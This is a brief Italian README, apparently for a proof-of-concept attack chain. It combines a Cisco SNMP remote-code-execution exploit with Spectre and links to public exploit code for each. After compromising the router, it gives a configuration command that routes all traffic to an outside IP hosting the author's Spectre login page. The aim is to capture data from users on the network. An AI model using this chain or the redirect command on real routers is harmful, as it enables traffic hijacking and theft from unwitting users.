
Una catena di exploit PoC che utilizza il recente exploit Cisco SMP (CVE-2017-6736) per concatenarsi con Spectre (CVE-2017-5753 e CVE-2017-5715).
Un exploit a catena PoC che usa il recente exploit Cisco SMP (CVE-2017-6736) per concatenare Spectre (CVE-2017-5753 e CVE-2017-5715)
Sottomodulo dell'exploit RCE Cisco di artkond: https://github.com/artkond/cisco-snmp-rce
POC JS Spectre per Chrome di ascendr: https://github.com/ascendr/spectre-chrome
Testato su un router Cisco 1841+2600.
Dopo aver eseguito l'exploit RCE. Come configurazione, esegui:
Router(config)> ip route 0.0.0.0 0.0.0.0 195.20.52.49
Questo forzerà tutto il traffico attraverso la pagina di login Spectre che ho creato. In futuro aggiungerò una versione migliore che si occupi di andare effettivamente sui siti web.